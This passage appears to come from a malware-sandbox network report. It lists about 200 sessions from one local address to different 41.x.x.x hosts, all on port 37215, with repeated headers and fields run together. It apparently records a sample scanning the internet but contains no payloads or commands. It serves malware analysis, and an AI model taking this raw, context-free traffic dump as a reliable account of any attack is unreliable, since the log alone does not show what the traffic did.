                                                                            22371192.168.2.154526041.246.69.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22372192.168.2.153445841.115.132.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22373192.168.2.153918241.38.118.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22374192.168.2.153890641.3.168.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22375192.168.2.154653641.134.245.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22376192.168.2.153530241.71.220.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22377192.168.2.154124841.241.147.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22378192.168.2.155008841.63.7.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22379192.168.2.155030841.249.251.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22380192.168.2.154509441.239.20.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22381192.168.2.155200841.43.120.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22382192.168.2.154781041.153.57.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22383192.168.2.154265041.202.178.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22384192.168.2.155450441.200.34.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22385192.168.2.155265841.49.113.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22386192.168.2.155573241.35.58.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22387192.168.2.155863841.36.70.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22388192.168.2.154810441.6.90.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22389192.168.2.153833241.219.198.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22390192.168.2.154598841.253.18.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22391192.168.2.156079841.56.243.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22392192.168.2.154183241.85.230.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22393192.168.2.155637241.150.141.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22394192.168.2.155274241.102.229.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22395192.168.2.153501441.167.74.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22396192.168.2.155659841.19.39.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22397192.168.2.156083441.120.0.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22398192.168.2.155782641.149.131.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22399192.168.2.155873841.208.131.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22400192.168.2.155913041.171.248.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22401192.168.2.155846241.78.230.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22402192.168.2.155437041.255.183.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22403192.168.2.153590841.193.23.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22404192.168.2.154566041.225.210.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22405192.168.2.155703841.6.84.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22406192.168.2.155252641.171.192.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22407192.168.2.155183841.51.139.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22408192.168.2.155446241.209.202.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22409192.168.2.154852641.191.152.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22410192.168.2.155342241.176.14.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22411192.168.2.154057041.27.31.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22412192.168.2.155202041.129.201.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22413192.168.2.154510241.53.245.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22414192.168.2.154695641.205.88.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22415192.168.2.154085441.191.4.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22416192.168.2.155541441.89.255.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22417192.168.2.154799841.154.78.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22418192.168.2.153560641.45.14.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22419192.168.2.155118441.189.118.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22420192.168.2.153440641.219.150.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22421192.168.2.155623441.179.7.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22422192.168.2.154582841.13.108.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22423192.168.2.154599841.188.189.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22424192.168.2.155018641.97.171.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22425192.168.2.153670841.183.53.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22426192.168.2.153286041.9.221.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22427192.168.2.153670041.24.38.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22428192.168.2.153994241.48.43.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22429192.168.2.154252441.154.156.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22430192.168.2.154536841.143.101.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22431192.168.2.154730041.62.119.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22432192.168.2.155192241.12.186.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22433192.168.2.153882841.113.166.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22434192.168.2.155398841.89.87.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22435192.168.2.153515441.67.198.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22436192.168.2.155609241.187.158.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22437192.168.2.154121841.244.255.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22438192.168.2.155075441.242.189.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22439192.168.2.154041041.134.86.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22440192.168.2.155890241.9.180.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22441192.168.2.155775241.205.125.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22442192.168.2.153713241.160.207.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22443192.168.2.154082041.48.22.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22444192.168.2.155730841.54.239.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22445192.168.2.154449841.154.109.22337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22446192.168.2.153933441.242.79.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22447192.168.2.153916441.242.71.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22448192.168.2.154789841.46.241.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22449192.168.2.153532441.67.71.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22450192.168.2.155765641.135.204.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22451192.168.2.154907841.203.104.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22452192.168.2.155410841.156.198.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22453192.168.2.154702241.152.152.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22454192.168.2.155849041.54.35.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22455192.168.2.153700841.98.40.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22456192.168.2.153947641.71.172.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22457192.168.2.153839041.198.98.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22458192.168.2.155891441.98.200.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22459192.168.2.154592641.32.28.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22460192.168.2.153850041.95.96.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22461192.168.2.154931441.5.192.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22462192.168.2.153677841.200.32.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22463192.168.2.155155441.78.156.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22464192.168.2.154721641.48.244.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22465192.168.2.155232641.68.203.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22466192.168.2.155376041.229.163.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22467192.168.2.153859441.111.3.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22468192.168.2.155565641.88.229.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22469192.168.2.154509241.27.193.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22470192.168.2.156077841.99.173.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22471192.168.2.155885641.66.203.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22472192.168.2.155376041.161.99.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22473192.168.2.153905241.255.80.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22474192.168.2.155714241.113.161.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22475192.168.2.154009041.18.243.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22476192.168.2.154354241.114.3.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22477192.168.2.154784241.111.4.7837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22478192.168.2.155650441.244.19.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22479192.168.2.153435841.34.252.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22480192.168.2.153729041.116.183.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22481192.168.2.153359241.135.146.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22482192.168.2.153635241.252.144.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22483192.168.2.154882641.140.174.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22484192.168.2.155730441.128.176.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22485192.168.2.155470441.213.145.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22486192.168.2.154962041.150.212.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22487192.168.2.155079841.163.214.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22488192.168.2.155351241.205.52.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22489192.168.2.153457441.28.250.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22490192.168.2.154653041.70.97.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22491192.168.2.154207641.91.72.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22492192.168.2.153731241.107.92.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22493192.168.2.155025841.132.163.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22494192.168.2.154987441.217.211.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22495192.168.2.155743241.193.81.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22496192.168.2.154249441.41.12.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22497192.168.2.154830441.133.97.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22498192.168.2.154082041.179.137.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22499192.168.2.153805641.215.7.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22500192.168.2.154874841.51.91.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22501192.168.2.153521441.75.57.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22502192.168.2.153746641.136.31.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22503192.168.2.156054441.85.99.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22504192.168.2.154778841.224.60.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22505192.168.2.154570441.30.230.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22506192.168.2.153803241.150.238.20237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22507192.168.2.155251441.103.163.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22508192.168.2.154125641.141.141.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22509192.168.2.154914641.136.212.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22510192.168.2.155565641.207.239.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22511192.168.2.154136841.8.36.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22512192.168.2.153413241.151.130.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22513192.168.2.155501441.98.63.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22514192.168.2.153587041.17.127.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22515192.168.2.156050641.243.244.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22516192.168.2.153952441.189.205.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22517192.168.2.154450441.61.113.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22518192.168.2.153757641.72.247.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22519192.168.2.154240841.98.192.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22520192.168.2.153366641.208.147.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22521192.168.2.154893441.109.106.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22522192.168.2.156056241.153.157.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22523192.168.2.154252641.126.101.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22524192.168.2.154166841.33.227.16937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22525192.168.2.155365841.154.185.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22526192.168.2.153722041.10.140.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22527192.168.2.154733041.47.122.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22528192.168.2.154625441.92.220.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22529192.168.2.155301641.112.28.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22530192.168.2.154177441.204.34.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22531192.168.2.155514441.219.161.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22532192.168.2.154382041.100.85.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22533192.168.2.155338241.68.26.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22534192.168.2.155769241.153.247.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22535192.168.2.155700041.65.40.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22536192.168.2.154617441.156.118.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22537192.168.2.155714041.143.91.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22538192.168.2.154178241.113.125.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22539192.168.2.153555241.228.14.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22540192.168.2.153713841.138.128.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22541192.168.2.156082841.11.73.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22542192.168.2.154519241.198.65.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22543192.168.2.155855241.119.227.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22544192.168.2.154516241.187.73.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22545192.168.2.153601441.170.28.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22546192.168.2.154055041.206.112.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22547192.168.2.155371241.152.128.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22548192.168.2.154744241.138.145.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22549192.168.2.155446641.176.119.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22550192.168.2.155054241.160.63.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22551192.168.2.154346041.167.86.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22552192.168.2.155079241.206.119.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22553192.168.2.155687641.161.237.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22554192.168.2.153816041.84.36.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22555192.168.2.153877441.115.134.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22556192.168.2.154240441.153.158.2437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22557192.168.2.155905841.167.219.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22558192.168.2.155609841.97.96.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22559192.168.2.155974641.194.230.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22560192.168.2.154620241.52.234.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22561192.168.2.154410441.2.152.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22562192.168.2.155958841.218.3.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22563192.168.2.153297241.232.165.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22564192.168.2.154420641.175.46.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22565192.168.2.155541241.48.85.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22566192.168.2.153695441.19.246.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22567192.168.2.154831241.106.222.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22568192.168.2.155339841.93.220.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22569192.168.2.154572241.28.145.19237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22570192.168.2.155597041.215.185.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22571192.168.2.154351041.81.58.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22572192.168.2.154919441.107.149.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            22573192.168.2.154720841.191.80.2437215
                                                                            TimestampBytes transferredDirectionData


